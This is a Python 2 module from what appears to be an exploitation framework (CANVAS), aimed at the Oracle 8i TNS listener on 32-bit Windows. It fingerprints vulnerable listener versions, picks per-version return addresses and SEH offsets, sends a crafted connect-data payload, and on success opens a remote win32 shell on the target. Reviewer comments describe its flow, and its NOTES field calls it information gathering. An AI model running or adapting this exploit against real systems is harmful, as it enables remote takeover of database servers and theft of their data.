def requestDatabaseInfo(self):
    """Query the TNS listener at ``self.host:self.port`` for its status data.

    Connects, sends the request produced by
    ``tnslib.TNSCONNECT().getStatusCommand()`` and reads a single TNS packet
    in reply.

    Returns:
        The value of ``TNS.recvAcceptData`` when the reply is an ACCEPT
        packet. 0 when the connection fails, the listener answers REFUSE,
        or any other packet type comes back.
    """
    sock = self.connectToHost(self.host, self.port)
    if not sock:
        return 0

    sock.set_timeout(150)
    self.log("Timeout is %d" % sock.get_timeout())

    # NOTE(review): nothing resembling credentials is passed on this path, so
    # a listener that answers with ACCEPT is handing its status data to any
    # client that can reach the port. Confirm against tnslib before relying
    # on this reading.
    status_request = tnslib.TNSCONNECT().getStatusCommand()
    tns = tnslib.TNS()
    tns.sendConnectRequest(sock, status_request)
    tns.recvTNSPkt(sock)

    result = 0
    reply_type = tns.packet_type
    if reply_type == tns.TNS_TYPE_REFUSE:
        # should have received database info
        self.log("Request for database info was refused.")
    elif reply_type == tns.TNS_TYPE_ACCEPT:
        # should have received database info
        self.log("Received database info")
        result = tns.recvAcceptData(sock, tns.tns_data)
    else:
        self.log("Did not receive database info")

    # NOTE(review): the socket is closed only on this straight-line path; an
    # exception raised by the send/receive calls above leaves it open.
    sock.close()
    return result
def test(self):
    """Report whether the listener's VERSION reply matches one known banner.

    Resolves host and port from ``self.target`` / ``self.argsDict``, sends a
    ``(COMMAND=VERSION)`` connect-data string and inspects the raw reply.

    Returns:
        1 when the reply contains the exact string
        ``TNSLSNR for 32-bit Windows: Version 8.1.7.0.0``; 0 otherwise,
        including when the connection cannot be opened.
    """
    # get server version
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))

    sock = self.connectToHost(self.host, self.port)
    if not sock:
        return 0
    self.log("Connected to TNS listener at %s:%d" % (self.host, self.port))

    version_query = "".join(("(CONNECT_DATA=", "(COMMAND=VERSION)", ")"))

    tns = tnslib.TNS()
    tns.sendRawCommand(sock, version_query)
    banner = tns.recvRawData(sock)
    sock.close()

    # The result is a banner fingerprint only: it is an exact substring match
    # on one platform/version string, so any other banner text (a different
    # build, or a listener that does not return this text) yields 0.
    matched = banner.count("TNSLSNR for 32-bit Windows: Version 8.1.7.0.0")
    if not matched:
        return 0
    self.log("Vulnerable Oracle8i version detected")
    return 1
def run(self):
    """Run the module against the TNS listener at ``self.target.interface``.

    Flow, as visible in this function:
      1. Resolve host/port and publish an "in progress" status.
      2. Refuse to continue when ``self.version`` is 0 (no automatic
         version selection); otherwise look up the per-version parameters
         in the module-level ``targets`` table.
      3. Build the connect data with ``self.buildCdata`` and send it to the
         listener as one raw command.
      4. Ask ``self.checkTriggerWin32`` whether the attempt worked; on
         success wrap the socket in a ``win32shellserver`` attached to a new
         ``win32Node`` and return that node.

    Returns:
        The new ``win32Node`` on success, 0 on every failure path.

    Python 2 only: the function uses the ``print`` statement.
    """
    self.host = self.target.interface
    print "Attacking: %s" % self.host
    self.port = int(self.argsDict.get("port", self.port))
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    if self.version == 0:
        # Version 0 means "not selected"; there is no auto-detection here.
        self.log("Auto versioning not available")
        self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port))
        return 0
    # `targets` is defined outside this function; each entry unpacks to
    # (info, align, retadd, seoffset).
    self.info, self.align, self.retadd, self.seoffset = targets[ self.version]
    cdata = self.buildCdata(self.align, self.retadd, self.seoffset)
    s = self.connectToHost(self.host, self.port)
    if not s:
        # NOTE(review): this path returns without updating setInfo, so the
        # status stays at "(in progress)".
        self.log("Could not connect to TNS listener")
        return 0
    if s:
        self.log("Connected to TNS listener at %s:%d" % (self.host, self.port))
        TNS = tnslib.TNS()
        TNS.sendRawCommand(s, cdata)
    else:
        # NOTE(review): unreachable -- the `if not s` guard above has already
        # returned for a falsy socket.
        self.done = 1
    if self.checkTriggerWin32(s):
        self.log("Setting success flag")
        self.setSucceeded()
        self.done = 1
        # Imported here rather than at module level, so these modules are
        # only needed on the success path.
        import win32MosdefShellServer
        from win32Node import win32Node
        node = win32Node()
        node.parentnode = self.argsDict["passednodes"][0]
        # NOTE(review): `newshell` is not used again in this function.
        newshell = win32MosdefShellServer.win32shellserver( s, node, self.logfunction)
        ret = node
    else:
        s.close()
    if self.ISucceeded():
        # NOTE(review): `ret` is bound only in the success branch above, so
        # this return relies on ISucceeded() being true only after that
        # branch ran in this call.
        self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port))
        return ret
    self.setInfo("%s attacking %s:%d - done (failed!)" % (NAME, self.host, self.port))
    return 0
# Module metadata read by the hosting framework.
# GTK2_DIALOG names a Glade file; presumably the module's GUI dialog -- confirm.
GTK2_DIALOG = "dialog.glade2"
# Category list; this module is filed under "Tools".
affectsList = ["Tools"]
NOTES = """ Attempt to gather some information on a remote Oracle database """
CHANGELOG = """ """

# GUI run exploit
# Re-export the framework's runner entry points under this module's namespace.
runAnExploit_gtk2 = canvasengine.runAnExploit_gtk2
runExploit = canvasengine.runExploit

# Module-level tnslib objects, constructed once at import time.
TNS = tnslib.TNS()
TNSCONN = tnslib.TNSCONNECT()


class theexploit(tcpexploit):
    """TCP module for an Oracle TNS listener, built on ``tcpexploit``.

    Per NOTES above, the stated purpose is gathering information about a
    remote Oracle database.
    """

    def __init__(self):
        """Initialise the base class and set this module's default state."""
        tcpexploit.__init__(self)
        self.setInfo(DESCRIPTION)
        # Hard-coded default host name; presumably replaced with the real
        # target before any connection is made -- confirm in the callers.
        self.host = "vmware.local"
        self.port = 1521 #this is the only real variable
        self.done = 0
        # 0 here means no version has been selected yet.
        self.version = 0
        self.dbasenames = []
        self.result = {}
        self.name = NAME
        return